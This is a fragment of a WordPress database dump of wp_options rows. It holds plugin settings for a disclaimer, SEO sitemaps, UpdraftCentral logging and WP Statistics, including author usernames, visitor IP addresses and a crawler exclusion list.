INSERT INTO `wp_options` VALUES (98796, 'dm_disclaimer_manager', 'a:4:{s:15:"disclaimer_text";s:651:"&lt;div class="disclaimer-text"&gt;\r\n\r\n	&lt;p&gt;<font size="1">The recommendation made here with and the information set forth with respect to the performance or use of our products are believed, but not warranted to be accurate. The products discussed are sold without warranty, as to fitness or performance, express or implied and upon condition that purchasers shall make their own test to determine suitability of such products for their particular purposes. Likewise, statements concerning the possible uses of our products are not intended as recommendations to use our products in the infringement of any patent.</font>&lt;/p&gt;\r\n&lt;/div&gt;";s:14:"disclaimer_css";s:154:".disclaimer-text {\r\n    border-top: 1px solid #D2D2D2;\r\n    border-bottom: 1px solid #D2D2D2;\r\n    margin-top: 4px 1px;\r\n    background-color: #FFFFFF;\r\n}";s:19:"disclaimer_position";s:6:"bottom";s:22:"author_with_disclaimer";a:25:{i:0;s:6:"asmith";i:1;s:7:"athongs";i:2;s:11:"brian.guffy";i:3;s:8:"CA Sales";i:4;s:17:"carol.quackenbush";i:5;s:6:"cmehta";i:6;s:18:"cpavlik@mschem.com";i:7;s:22:"dollielajeunesselj2225";i:8;s:7:"ecarter";i:9;s:12:"hienautotech";i:10;s:14:"jarelis.roman2";i:11;s:5:"jjjjj";i:12;s:12:"keith.crider";i:13;s:11:"kmsoulliere";i:14;s:4:"Leah";i:15;s:7:"lwilson";i:16;s:5:"lynnb";i:17;s:7:"Melissa";i:18;s:17:"michael.b.taylor1";i:19;s:13:"michael.zurek";i:20;s:13:"rex.blackwell";i:21;s:7:"s.gater";i:22;s:8:"sfalcone";i:23;s:11:"shujie.yang";i:24;s:6:"zayyan";}}', 'yes'); 
INSERT INTO `wp_options` VALUES (101806, 'wpseo_onpage', 'a:2:{s:6:"status";i:-1;s:10:"last_fetch";i:1503410371;}', 'yes'); 
INSERT INTO `wp_options` VALUES (102481, 'wpseo_sitemap_1007_cache_validator', '5W7u3', 'no'); 
INSERT INTO `wp_options` VALUES (102482, 'wpseo_sitemap_1006_cache_validator', '5W7vk', 'no'); 
INSERT INTO `wp_options` VALUES (102483, 'wpseo_sitemap_1005_cache_validator', '5W7vH', 'no'); 
INSERT INTO `wp_options` VALUES (102484, 'wpseo_sitemap_1004_cache_validator', '5W7vV', 'no'); 
INSERT INTO `wp_options` VALUES (102485, 'wpseo_sitemap_1003_cache_validator', '5W7wc', 'no'); 
INSERT INTO `wp_options` VALUES (102486, 'wpseo_sitemap_1008_cache_validator', '5W7wE', 'no'); 
INSERT INTO `wp_options` VALUES (106076, 'updraftcentral_client_log', 'a:43:{i:0;a:6:{s:4:"time";i:1475202663;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:14:"112.216.13.194";s:15:"http_user_agent";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";}i:1;a:6:{s:4:"time";i:1475308032;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"92.105.51.177";s:15:"http_user_agent";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";}i:2;a:6:{s:4:"time";i:1475308083;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"92.105.51.177";s:15:"http_user_agent";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";}i:3;a:6:{s:4:"time";i:1475308093;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"92.105.51.177";s:15:"http_user_agent";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";}i:4;a:6:{s:4:"time";i:1475308124;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"92.105.51.177";s:15:"http_user_agent";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";}i:5;a:6:{s:4:"time";i:1475308143;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"92.105.51.177";s:15:"http_user_agent";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";}i:6;a:6:{s:4:"time";i:1475308605;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"92.105.51.177";s:15:"http_user_agent";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";}i:7;a:6:{s:4:"time";i:1475308688;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"92.105.51.177";s:15:"http_user_agent";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";}i:8;a:6:{s:4:"time";i:1475308727;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"92.105.51.177";s:15:"http_user_agent";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";}i:9;a:6:{s:4:"time";i:1475308782;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"92.105.51.177";s:15:"http_user_agent";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";}i:10;a:6:{s:4:"time";i:1475308784;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"92.105.51.177";s:15:"http_user_agent";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";}i:11;a:6:{s:4:"time";i:1475643216;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:14:"180.158.201.65";s:15:"http_user_agent";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36";}i:12;a:6:{s:4:"time";i:1475643244;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:14:"180.158.201.65";s:15:"http_user_agent";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36";}i:13;a:6:{s:4:"time";i:1475643302;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:14:"180.158.201.65";s:15:"http_user_agent";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36";}i:14;a:6:{s:4:"time";i:1475643323;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:14:"180.158.201.65";s:15:"http_user_agent";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36";}i:15;a:6:{s:4:"time";i:1475643400;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:14:"180.158.201.65";s:15:"http_user_agent";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36";}i:16;a:6:{s:4:"time";i:1475643421;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:14:"180.158.201.65";s:15:"http_user_agent";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36";}i:17;a:6:{s:4:"time";i:1475643443;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:14:"180.158.201.65";s:15:"http_user_agent";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36";}i:18;a:6:{s:4:"time";i:1475643465;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:14:"180.158.201.65";s:15:"http_user_agent";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36";}i:19;a:6:{s:4:"time";i:1475643678;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:14:"180.158.201.65";s:15:"http_user_agent";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36";}i:20;a:6:{s:4:"time";i:1475643698;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:14:"180.158.201.65";s:15:"http_user_agent";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36";}i:21;a:6:{s:4:"time";i:1475719363;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"153.156.73.13";s:15:"http_user_agent";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";}i:22;a:6:{s:4:"time";i:1475719402;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"153.156.73.13";s:15:"http_user_agent";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";}i:23;a:6:{s:4:"time";i:1476255985;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"62.244.113.18";s:15:"http_user_agent";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";}i:24;a:6:{s:4:"time";i:1476303278;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"24.63.154.108";s:15:"http_user_agent";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";}i:25;a:6:{s:4:"time";i:1476377641;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"24.63.154.108";s:15:"http_user_agent";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";}i:26;a:6:{s:4:"time";i:1476377859;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"24.63.154.108";s:15:"http_user_agent";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";}i:27;a:6:{s:4:"time";i:1476377897;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"24.63.154.108";s:15:"http_user_agent";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";}i:28;a:6:{s:4:"time";i:1476378181;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"24.63.154.108";s:15:"http_user_agent";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";}i:29;a:6:{s:4:"time";i:1476378188;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"24.63.154.108";s:15:"http_user_agent";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";}i:30;a:6:{s:4:"time";i:1476378218;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"24.63.154.108";s:15:"http_user_agent";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";}i:31;a:6:{s:4:"time";i:1476378236;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"24.63.154.108";s:15:"http_user_agent";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";}i:32;a:6:{s:4:"time";i:1476378248;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"24.63.154.108";s:15:"http_user_agent";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";}i:33;a:6:{s:4:"time";i:1476378284;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"24.63.154.108";s:15:"http_user_agent";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";}i:34;a:6:{s:4:"time";i:1476378301;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"24.63.154.108";s:15:"http_user_agent";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";}i:35;a:6:{s:4:"time";i:1476465317;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"24.63.154.108";s:15:"http_user_agent";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";}i:36;a:6:{s:4:"time";i:1476593278;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"66.249.79.153";s:15:"http_user_agent";s:73:"Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)";}i:37;a:6:{s:4:"time";i:1476903443;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"66.249.79.153";s:15:"http_user_agent";s:73:"Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)";}i:38;a:6:{s:4:"time";i:1477013280;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:12:"27.223.28.58";s:15:"http_user_agent";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36";}i:39;a:6:{s:4:"time";i:1477068502;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"66.249.79.157";s:15:"http_user_agent";s:73:"Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)";}i:40;a:6:{s:4:"time";i:1477502031;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:11:"75.45.15.97";s:15:"http_user_agent";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0";}i:41;a:6:{s:4:"time";i:1477511109;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:13:"24.63.154.108";s:15:"http_user_agent";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";}i:42;a:6:{s:4:"time";i:1477513932;s:5:"level";s:6:"notice";s:7:"message";s:62:"Message was received, but not understood by local site (for: )";s:18:"key_name_indicator";s:57:"8c68da59bf8b0c8fc65b571610c48bbb.migrator.updraftplus.com";s:9:"remote_ip";s:14:"174.49.219.132";s:15:"http_user_agent";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";}}', 'no'); 
INSERT INTO `wp_options` VALUES (138550, 'wpem_sent', '1475351494', 'yes'); 
INSERT INTO `wp_options` VALUES (159317, 'wpcf7', 'a:2:{s:7:"version";s:5:"4.5.1";s:13:"bulk_validate";a:4:{s:9:"timestamp";i:1475521490;s:7:"version";s:5:"4.5.1";s:11:"count_valid";i:1;s:13:"count_invalid";i:0;}}', 'yes'); 
INSERT INTO `wp_options` VALUES (159318, 'wpseo_sitemap_wpcf7_contact_form_cache_validator', '5XDgO', 'no'); 
INSERT INTO `wp_options` VALUES (180848, 'wp_statistics_plugin_version', '11.0.2', 'yes'); 
INSERT INTO `wp_options` VALUES (180849, 'wp_statistics_db_version', '11.0.2', 'yes'); 
INSERT INTO `wp_options` VALUES (180850, 'wp_statistics', 'a:83:{s:18:"pending_db_updates";a:2:{s:13:"date_ip_agent";b:0;s:11:"unique_date";b:0;}s:16:"search_converted";i:1;s:5:"geoip";s:0:"";s:8:"browscap";s:0:"";s:10:"useronline";s:0:"";s:6:"visits";s:1:"1";s:8:"visitors";s:1:"1";s:5:"pages";s:1:"1";s:12:"check_online";s:2:"30";s:8:"menu_bar";s:1:"0";s:11:"coefficient";s:1:"1";s:12:"stats_report";s:0:"";s:11:"time_report";s:5:"daily";s:11:"send_report";s:4:"mail";s:14:"content_report";s:0:"";s:12:"update_geoip";s:0:"";s:8:"store_ua";s:0:"";s:9:"robotlist";s:1875:"007ac9\r\n5bot\r\nA6-Indexer\r\nAbachoBOT\r\naccoona\r\nAcoiRobot\r\nAddThis.com\r\nADmantX\r\nAdsBot-Google\r\nadvbot\r\nAhrefsBot\r\naiHitBot\r\nalexa\r\nalphabot\r\nAltaVista\r\nAntivirusPro\r\nanyevent\r\nappie\r\nApplebot\r\narchive.org_bot\r\nAsk Jeeves\r\nASPSeek\r\nBaiduspider\r\nBenjojo\r\nBeetleBot\r\nbingbot\r\nBlekkobot\r\nblexbot\r\nBOT for JCE\r\nbubing\r\nButterfly\r\ncbot\r\nclamantivirus\r\ncliqzbot\r\nclumboot\r\ncoccoc\r\ncrawler\r\nCrocCrawler\r\ncrowsnest.tv\r\ndbot\r\ndl2bot\r\ndotbot\r\ndownloadbot\r\nduckduckgo\r\nDumbot\r\nEasouSpider\r\neStyle\r\nEveryoneSocialBot\r\nExabot\r\nezooms\r\nfacebook.com\r\nfacebookexternalhit\r\nFAST\r\nFeedfetcher-Google\r\nfeedzirra\r\nfindxbot\r\nFirfly\r\nFriendFeedBot\r\nfroogle\r\nGeonaBot\r\nGigabot\r\ngirafabot\r\ngimme60bot\r\nglbot\r\nGooglebot\r\nGroupHigh\r\nia_archiver\r\nIDBot\r\nInfoSeek\r\ninktomi\r\nIstellaBot\r\njetmon\r\nKraken\r\nLeikibot\r\nlinkapediabot\r\nlinkdexbot\r\nLinkpadBot\r\nLoadTimeBot\r\nlooksmart\r\nltx71\r\nLycos\r\nMail.RU_Bot\r\nMe.dium\r\nmeanpathbot\r\nmediabot\r\nmedialbot\r\nMediapartners-Google\r\nMJ12bot\r\nmsnbot\r\nMojeekBot\r\nmonobot\r\nmoreover\r\nMRBOT\r\nNationalDirectory\r\nNerdyBot\r\nNetcraftSurveyAgent\r\nniki-bot\r\nnutch\r\nOpenbot\r\nOrangeBot\r\nowler\r\np4Bot\r\nPaperLiBot\r\npageanalyzer\r\nPagesInventory\r\nPimonster\r\nporkbun\r\npr-cy\r\nproximic\r\npwbot\r\nr4bot\r\nrabaz\r\nRambler\r\nRankivabot\r\nrevip\r\nriddler\r\nrogerbot\r\nScooter\r\nScrubby\r\nscrapy.org\r\nSearchmetricsBot\r\nsees.co\r\nSemanticBot\r\nSemrushBot\r\nSeznamBot\r\nsfFeedReader\r\nshareaholic-bot\r\nsistrix\r\nSiteExplorer\r\nSlurp\r\nSocialradarbot\r\nSocialSearch\r\nSogou web spider\r\nSpade\r\nspbot\r\nSpiderLing\r\nSputnikBot\r\nSuperfeedr\r\nSurveyBot\r\nTechnoratiSnoop\r\nTECNOSEEK\r\nTeoma\r\ntrendictionbot\r\nTweetmemeBot\r\nTwiceler\r\nTwitterbot\r\nTwitturls\r\nu2bot\r\nuMBot-LN\r\nuni5download\r\nunrulymedia\r\nURL_Spider_SQL\r\nVagabondo\r\nvBSEO\r\nWASALive-Bot\r\nWebAlta Crawler\r\nWebBug\r\nWebFindBot\r\nWebMasterAid\r\nWeSEE\r\nWotbox\r\nwsowner\r\nwsr-agent\r\nwww.galaxy.com\r\nx100bot\r\nXoviBot\r\nxzybot\r\nyandex\r\nYahoo\r\nYammybot\r\nYoudaoBot\r\nZyBorg\r\nZemlyaCrawl";s:21:"exclude_administrator";s:1:"1";s:18:"disable_se_clearch";s:1:"1";s:14:"disable_se_ask";s:1:"1";s:8:"map_type";s:6:"jqvmap";s:18:"force_robot_update";s:1:"1";s:15:"update_browscap";b:1;s:16:"disable_se_baidu";s:0:"";s:15:"disable_se_bing";s:0:"";s:21:"disable_se_duckduckgo";s:0:"";s:17:"disable_se_google";s:0:"";s:16:"disable_se_yahoo";s:0:"";s:17:"disable_se_yandex";s:0:"";s:15:"track_all_pages";s:0:"";s:14:"disable_column";s:0:"";s:12:"chart_totals";s:0:"";s:12:"hide_notices";s:0:"";s:13:"delete_manual";s:0:"";s:8:"hash_ips";s:0:"";s:10:"all_online";s:0:"";s:20:"strip_uri_parameters";s:0:"";s:17:"override_language";s:0:"";s:14:"addsearchwords";s:0:"";s:10:"email_list";s:24:"support@notactiveddd.com";s:15:"browscap_report";s:0:"";s:12:"geoip_report";s:0:"";s:12:"prune_report";s:0:"";s:14:"upgrade_report";s:0:"";s:11:"disable_map";s:0:"";s:17:"disable_dashboard";s:0:"";s:14:"disable_editor";s:0:"";s:15:"read_capability";s:14:"manage_options";s:17:"manage_capability";s:14:"manage_options";s:14:"exclude_editor";s:0:"";s:14:"exclude_author";s:0:"";s:19:"exclude_contributor";s:0:"";s:18:"exclude_subscriber";s:0:"";s:16:"exclude_customer";s:0:"";s:20:"exclude_shop_manager";s:0:"";s:13:"exclude_agent";s:0:"";s:17:"record_exclusions";s:0:"";s:10:"exclude_ip";s:0:"";s:17:"exclude_loginpage";s:0:"";s:17:"exclude_adminpage";s:0:"";s:18:"excluded_countries";s:0:"";s:18:"included_countries";s:0:"";s:14:"excluded_hosts";s:0:"";s:15:"robot_threshold";s:0:"";s:12:"use_honeypot";s:0:"";s:15:"honeypot_postid";s:0:"";s:13:"exclude_feeds";s:0:"";s:13:"excluded_urls";s:0:"";s:12:"exclude_404s";s:0:"";s:20:"corrupt_browser_info";s:0:"";s:14:"schedule_geoip";s:0:"";s:8:"auto_pop";s:0:"";s:20:"private_country_code";s:3:"000";s:17:"schedule_browscap";s:0:"";s:12:"referrerspam";s:0:"";s:19:"update_referrerspam";s:0:"";s:21:"schedule_referrerspam";s:0:"";s:16:"last_browscap_dl";i:0;s:16:"schedule_dbmaint";s:0:"";s:21:"schedule_dbmaint_days";s:3:"365";s:24:"schedule_dbmaint_visitor";s:0:"";s:29:"schedule_dbmaint_visitor_hits";s:2:"50";}', 'yes'); 
INSERT INTO `wp_options` VALUES (180851, 'widget_wpstatistics_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (202574, 'wpseo_sitemap_2277_cache_validator', '5Vsil', 'no'); 
INSERT INTO `wp_options` VALUES (217464, 'wpseo_sitemap_2302_cache_validator', '4o9p5', 'no'); 
INSERT INTO `wp_options` VALUES (218005, 'wpseo_sitemap_2305_cache_validator', '4wkdh', 'no'); 
INSERT INTO `wp_options` VALUES (218658, 'wpseo_sitemap_2308_cache_validator', '4Cw3R', 'no'); 
INSERT INTO `wp_options` VALUES (219095, 'wpseo_sitemap_2311_cache_validator', '4HqGc', 'no'); 
INSERT INTO `wp_options` VALUES (220381, 'wpseo_sitemap_2317_cache_validator', '4XLtB', 'no'); 
